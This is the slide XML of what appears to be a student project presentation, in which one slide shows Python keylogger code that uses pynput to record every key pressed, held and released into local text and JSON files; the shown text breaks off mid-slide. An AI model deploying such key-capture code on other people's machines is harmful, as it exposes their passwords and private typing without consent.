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2" d="100"/>
          <a:sy n="102" d="100"/>
        </p:scale>
        <p:origin x="198"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09-04-2024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4/9/2024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4/9/2024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4/9/2024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4/9/2024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4/9/2024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4/9/2024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4/9/2024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4/9/2024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4/9/2024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4/9/2024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4/9/2024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4/9/2024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 and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a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SUNIL ABRAHAM S</a:t>
            </a:r>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KINGS ENGINEERING COLLEGE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>COMPUTER SCIENCE AND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729866"/>
            <a:ext cx="11029616" cy="530296"/>
          </a:xfrm>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4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D579147-82B4-ECEE-E746-6A031DD058F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1346454" y="-7654081"/>
            <a:ext cx="4880610" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{672C87D4-EE03-9E40-1F70-7E30C5B1C45F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1135374" y="1260162"/>
            <a:ext cx="2956335" cy="5509200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tk</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> import keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys = ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    with open('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key_log.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>', '+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>') as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>json.dumps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).encode()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key_log.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">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r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    if flag == False:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>            {'Pressed': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        flag = True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>            {'Held': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">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endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
